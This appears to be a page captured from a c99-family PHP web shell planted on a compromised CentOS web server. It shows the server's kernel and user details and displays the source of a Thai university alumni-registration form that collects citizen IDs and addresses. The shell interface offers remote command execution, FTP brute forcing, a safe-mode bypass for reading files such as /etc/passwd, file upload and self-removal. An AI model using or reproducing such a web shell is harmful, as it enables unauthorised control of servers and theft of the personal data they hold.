!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/ealumni/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_addAlumni.php (18.34 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<SCRIPT language=JavaScript type="text/JavaScript">
function checkId(){
    var data = document.getElementById('sdtCitizenId');

    if (data.value.length==13){
        for(i=0,sum=0;i<12;i++)
            sum += parseFloat(data.value.charAt(i))*(13-i);
            if((11-sum%11)%10!=parseFloat(data.value.charAt(12))){
                alert('เลขบัตรประชาชนไม่ถูกต้อง กรุณาป้อนเลขบัตรประชาชนใหม่');
                document.getElementById('sdtCitizenId').style.color = "red";
            }else{
                document.getElementById('sdtCitizenId').style.color = "green";
            }
    }else if(data.value!=""){
        alert('เลขบัตรประชาชนไม่ครบ 13 หลัก');
    }
}

function copyAddr(chk) {
    var homeAddr = document.getElementById("homeAddr").value;
    var dtNameHome = document.getElementById("dtNameHome").value;
    var dtIdHome = document.getElementById("dtIdHome").value;
    var apNameHome = document.getElementById("apNameHome").value;
    var apIdHome = document.getElementById("apIdHome").value;
    var prvNameHome = document.getElementById("prvNameHome").value;
    var prvIdHome = document.getElementById("prvIdHome").value;
    var zipcodeHome = document.getElementById("zipcodeHome").value;
    var phoneHome = document.getElementById("phoneHome").value;

    if(chk.name=="homeChk") {
        if(document.myform.homeChk.checked==true) {
            document.getElementById("homeCur").value = homeAddr;
            document.getElementById("dtNameCur").value = dtNameHome;
            document.getElementById("dtIdCur").value = dtIdHome;
            document.getElementById("apNameCur").value = apNameHome;
            document.getElementById("apIdCur").value = apIdHome;
            document.getElementById("prvNameCur").value = prvNameHome;
            document.getElementById("prvIdCur").value = prvIdHome;
            document.getElementById("zipcodeCur").value = zipcodeHome;
            document.getElementById("phoneCur").value = phoneHome;
        } else {
            document.getElementById("homeCur").value = "";
            document.getElementById("dtNameCur").value = "";
            document.getElementById("dtIdCur").value = "";
            document.getElementById("apNameCur").value = "";
            document.getElementById("apIdCur").value = "";
            document.getElementById("prvNameCur").value = "";
            document.getElementById("prvIdCur").value = "";
            document.getElementById("zipcodeCur").value = "";
            document.getElementById("phoneCur").value = "";
        }
    }

    if(chk.name=="workChk") {
        if(document.myform.workChk.checked==true) {
            document.getElementById("homeWork").value = homeAddr;
            document.getElementById("dtNameWork").value = dtNameHome;
            document.getElementById("dtIdWork").value = dtIdHome;
            document.getElementById("apNameWork").value = apNameHome;
            document.getElementById("apIdWork").value = apIdHome;
            document.getElementById("prvNameWork").value = prvNameHome;
            document.getElementById("prvIdWork").value = prvIdHome;
            document.getElementById("zipcodeWork").value = zipcodeHome;
            document.getElementById("phoneWork").value = phoneHome;
        } else {
            document.getElementById("homeWork").value = "";
            document.getElementById("dtNameWork").value = "";
            document.getElementById("dtIdWork").value = "";
            document.getElementById("apNameWork").value = "";
            document.getElementById("apIdWork").value = "";
            document.getElementById("prvNameWork").value = "";
            document.getElementById("prvIdWork").value = "";
            document.getElementById("zipcodeWork").value = "";
            document.getElementById("phoneWork").value = "";
        }
    }
}
</SCRIPT>
<table width="100%">
    <tr>
        <td align="center"><span class="h error">เพิ่มศิษย์เก่า</span></td>
    </tr>
    <tr>
        <td><br /></td>
    </tr>
<?php
    
if($this->session->flashdata('flgSave')) {
?>
    <tr>
        <td align="center"><?php echo $this->session->flashdata('flgSave');?></td>
    </tr>
<?php
    
}
?>
    <tr>
        <td><?php echo form_open($this->config->item("ea_folder")."add_alumni/process_addAm", array("name" => "myform""id" => "myform"));?>
        <table class="szone">
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>รหัสนักศึกษา</b></td>
                <td><input type="text" name="stdCode" id="stdCode" size="11" maxlength="10" value="<?php echo set_value('stdCode');?>" /><span class="error"> * <?php echo form_error('stdCode');?></span></td>
                <td class="coltd_szone"><b>รหัสบัตรประชาชน</b></td>
                <td><input type="text" name="sdtCitizenId" id="sdtCitizenId" size="14" maxlength="13" value="<?php echo set_value('sdtCitizenId');?>" onchange="checkId()" class="required-int" />
                <span class="error"><?php echo form_error('sdtCitizenId');?></span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>ชื่อ-สกุล ภาษาไทย</b></td>
                <td colspan="3">
<?php 
                
echo form_dropdown('pfId'$rs_pfset_value('pfId'));
?>
                <input type="text" name="stdName" id="stdName" size="15" maxlength="30" value="<?php echo set_value('stdName');?>" />
                <input type="text" name="stdSurname" id="stdSurname" size="15" maxlength="30" value="<?php echo set_value('stdSurname');?>" /><span class="error"> * <?php echo form_error('pfId') ? form_error('pfId') : (form_error('stdName') ? form_error('stdName') : form_error('stdSurname'));?></span>
                </td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>ชื่อ-สกุล ภาษาอังกฤษ</b></td>
                <td colspan="3">
                <input type="text" name="stdNameE" id="stdNameE" size="15" maxlength="30" value="<?php echo set_value('stdNameE');?>" />
                <input type="text" name="stdSurnameE" id="stdSurnameE" size="15" maxlength="30" value="<?php echo set_value('stdSurnameE');?>" /></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>ชื่อ-สกุลเดิม ภาษาไทย</b></td>
                <td colspan="3">
<?php 
                
echo form_dropdown('pfIdOld'$rs_pfset_value('pfIdOld'));
?>
                <input type="text" name="stdNameOld" id="stdNameOld" size="15" maxlength="30" value="<?php echo set_value('stdNameOld');?>" />
                <input type="text" name="stdSurnameOld" id="stdSurnameOld" size="15" maxlength="30" value="<?php echo set_value('stdSurnameOld');?>" /></td>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>ชื่อ-สกุลเดิม ภาษาอังกฤษ</b></td>
                <td colspan="3">
                <input type="text" name="stdNameOldE" id="stdNameOldE" size="15" maxlength="30" value="<?php echo set_value('stdNameOldE');?>" />
                <input type="text" name="stdSurnameOldE" id="stdSurnameOldE" size="15" maxlength="30" value="<?php echo set_value('stdSurnameOldE');?>" /></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>วันเกิด</b></td>
                <td><script>DateInput('birthDate', true, 'DD/MM/YYYY', '<?php echo set_value("birthDate") ? set_value("birthDate") : getNowDateFw2();?>');</script></td>
                <td class="coltd_szone"><b>สัญชาติ</b></td>
                <td>
<?php 
                
echo form_dropdown('ntId'$rs_ntset_value('ntId'));
?>
                </td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>ศาสนา</b></td>
                <td>
<?php 
                
echo form_dropdown('rlgId'$rs_rlgset_value('rlgId'));
?>
                </td>
                <td class="coltd_szone"><b>อีเมล์</b></td>
                <td><input type="text" name="email" id="email" value="<?php echo set_value('email');?>" size="30" maxlength="50" />
                <?php echo form_error('email');?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone" colspan="4"><br /></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone" colspan="4"><span class="error">ประวัติการศึกษา</span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>หลักสูตร (ทะเบียน)</b></td>
                <td colspan="3">
<?php 
                
echo form_dropdown('curId'$rs_curdset_value('curId'));
?>
                </td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>หลักสูตร (ศิษย์เก่า)</b></td>
                <td colspan="3">
<?php
                
echo form_dropdown('amProgramAlumni'$rs_paset_value('amProgramAlumni'));
?>
                <span class="error"> * <?php echo form_error('amProgramAlumni');?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>ปีที่เข้า</b></td>
                <td><input type="tex" name="admitAcY" id="admitAcY" value="<?php echo set_value('admitAcY');?>" size="5" maxlength="4" class="required-int" />
                <span class="error"> * <?php echo form_error('admitAcY');?></span></td>
                <td class="coltd_szone"><b>ปีการศึกษาที่จบ</b></td>
                <td><input type="tex" name="graduateY" id="graduateY" value="<?php echo set_value('graduateY');?>" size="5" maxlength="4" class="required-int" />
                <span class="error"> * <?php echo form_error('graduateY');?></span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>รุ่นที่</b></td>
                <td colspan="3">
<?php
                
echo form_dropdown('genId'$rs_genset_value('genId'));
?>
                </td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone" colspan="4"><br /></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone" colspan="4"><span class="error">ที่อยู่ศิษย์เก่า (ตามภูมิลำเนา)</span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>ที่อยู่</b></td>
                <td>
<?php
                $homeAddr_de 
= array('name' => 'homeAddr','id' => 'homeAddr''value' => set_value('homeAddr'), 'rows' => '1''cols' => '30');
                echo 
form_textarea($homeAddr_de);
?>
                </td>
                <td class="coltd_szone"><b>ตำบล</b></td>
                <td><input type="text" name="dtNameHome" id="dtNameHome" value="<?php echo set_value('dtNameHome');?>" readonly class="input2" />
                <input type="hidden" name="dtIdHome" id="dtIdHome" value="<?php echo set_value('dtIdHome');?>" readonly />
<?php
                
echo anchor_popup($this->config->item("ea_folder")."popup/homeAddr_search""<img src=\"".base_url().$this->config->item('ea_search')."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "550""height" => "350"));
?>
                </td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>อำเภอ</b></td>
                <td><input type="text" name="apNameHome" id="apNameHome" value="<?php echo set_value('apNameHome');?>" class="input2" readonly />
                <input type="hidden" name="apIdHome" id="apIdHome" value="<?php echo set_value('apIdHome');?>" readonly /></td>
                <td class="coltd_szone"><b>จังหวัด</b></td>
                <td><input type="text" name="prvNameHome" id="prvNameHome" value="<?php echo set_value('prvNameHome');?>" class="input2" readonly />
                <input type="hidden" name="prvIdHome" id="prvIdHome" value="<?php echo set_value('prvIdHome');?>" readonly /></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>รหัสไปรษณีย์</b></td>
                <td><input type="text" name="zipcodeHome" id="zipcodeHome" value="<?php echo set_value('zipcodeHome');?>" size="6" maxlength="5" class="required-int" />
                <span class="error"><?php echo form_error('zipcodeHome');?></span></td>
                <td class="coltd_szone"><b>โทรศัพท์</b></td>
                <td><input type="text" name="phoneHome" id="phoneHome" value="<?php echo set_value('phoneHome');?>" size="11" maxlength="10" class="required-int" />
                <span class="error"><?php echo form_error('phoneHome');?></span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone" colspan="4"><br /></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone" colspan="4"><span class="error">ที่อยู่ศิษย์เก่า (ปัจจุบัน)</span>
                <input type="checkbox" name="homeChk" id="homeChk" value="1" onClick="copyAddr(this)" /> ใช้ที่อยู่ศิษย์เก่า (ตามภูมิลำเนา)</td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>ที่อยู่</b></td>
                <td>
<?php
                $curAddr_de 
= array('name' => 'homeCur','id' => 'homeCur''value' => set_value('homeCur'), 'rows' => '1''cols' => '30');
                echo 
form_textarea($curAddr_de);
?>
                </td>
                <td class="coltd_szone"><b>ตำบล</b></td>
                <td><input type="text" name="dtNameCur" id="dtNameCur" value="<?php echo set_value('dtNameCur');?>" readonly class="input2" />
                <input type="hidden" name="dtIdCur" id="dtIdCur" value="<?php echo set_value('dtIdCur');?>" readonly />
<?php
                
echo anchor_popup($this->config->item("ea_folder")."popup/curAddr""<img src=\"".base_url().$this->config->item('ea_search')."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "550""height" => "350"));
?>
                </td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>อำเภอ</b></td>
                <td><input type="text" name="apNameCur" id="apNameCur" value="<?php echo set_value('apNameCur');?>" class="input2" readonly />
                <input type="hidden" name="apIdCur" id="apIdCur" value="<?php echo set_value('apIdCur');?>" readonly /></td>
                <td class="coltd_szone"><b>จังหวัด</b></td>
                <td><input type="text" name="prvNameCur" id="prvNameCur" value="<?php echo set_value('prvNameCur');?>" class="input2" readonly />
                <input type="hidden" name="prvIdCur" id="prvIdCur" value="<?php echo set_value('prvIdCur');?>" readonly /></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>รหัสไปรษณีย์</b></td>
                <td><input type="text" name="zipcodeCur" id="zipcodeCur" value="<?php echo set_value('zipcodeCur');?>" size="5" maxlength="5" class="required-int" />
                <span class="error"><?php echo form_error('zipcodeCur');?></span></td>
                <td class="coltd_szone"><b>โทรศัพท์</b></td>
                <td><input type="text" name="phoneCur" id="phoneCur" value="<?php echo set_value('phoneCur');?>" size="11" maxlength="10" class="required-int" />
                <span class="error"><?php echo form_error('phoneCur');?></span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone" colspan="4"><br /></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone" colspan="4"><span class="error">ที่อยู่ที่ทำงานของศิษย์เก่า</span>
                <input type="checkbox" name="workChk" id="workChk" value="1" onClick="copyAddr(this)" /> ใช้ที่อยู่ศิษย์เก่า (ตามภูมิลำเนา)</td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>ที่อยู่</b></td>
                <td>
<?php
                $workAddr_de 
= array('name' => 'homeWork','id' => 'homeWork''value' => set_value('homeWork'), 'rows' => '1''cols' => '30');
                echo 
form_textarea($workAddr_de);
?>
                </td>
                <td class="coltd_szone"><b>ตำบล</b></td>
                <td><input type="text" name="dtNameWork" id="dtNameWork" value="<?php echo set_value('dtNameWork');?>" readonly class="input2" />
                <input type="hidden" name="dtIdWork" id="dtIdWork" value="<?php echo set_value('dtIdWork');?>" readonly />
<?php
                
echo anchor_popup($this->config->item("ea_folder")."popup/workAddr""<img src=\"".base_url().$this->config->item('ea_search')."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "550""height" => "350"));
?>
                </td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>อำเภอ</b></td>
                <td><input type="text" name="apNameWork" id="apNameWork" value="<?php echo set_value('apNameWork');?>" class="input2" readonly />
                <input type="hidden" name="apIdWork" id="apIdWork" value="<?php echo set_value('apIdWork');?>" readonly /></td>
                <td class="coltd_szone"><b>จังหวัด</b></td>
                <td><input type="text" name="prvNameWork" id="prvNameWork" value="<?php echo set_value('prvNameWork');?>" class="input2" readonly />
                <input type="hidden" name="prvIdWork" id="prvIdWork" value="<?php echo set_value('prvIdWork');?>" readonly /></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone"><b>รหัสไปรษณีย์</b></td>
                <td><input type="text" name="zipcodeWork" id="zipcodeWork" value="<?php echo set_value('zipcodeWork');?>" size="5" maxlength="5" class="required-int" />
                <span class="error"><?php echo form_error('zipcodeWork');?></span></td>
                <td class="coltd_szone"><b>โทรศัพท์</b></td>
                <td><input type="text" name="phoneWork" id="phoneWork" value="<?php echo set_value('phoneWork');?>" size="11" maxlength="10" class="required-int" />
                <span class="error"><?php echo form_error('phoneWork');?></span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td align="center" colspan="4">
                <input type="submit" name="add" id="add" value="บันทึก" />
                <input type="reset" name="reset" id="reset" value="เคลียร์ข้อมูล" />
                </td>
            </tr>
        <?php echo form_close();?></table></td>
    </tr>
    <tr>
        <td><table class="mark">
            <tr>
                <td class="coltd_mark"><span class="error"><b>หมายเหตุ : </b></span></td>
                <td><span class="error">* หมายถึง ต้องกรอกข้อมูลให้สมบูรณ์</span></td>
            </tr>
        </table></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.011 ]--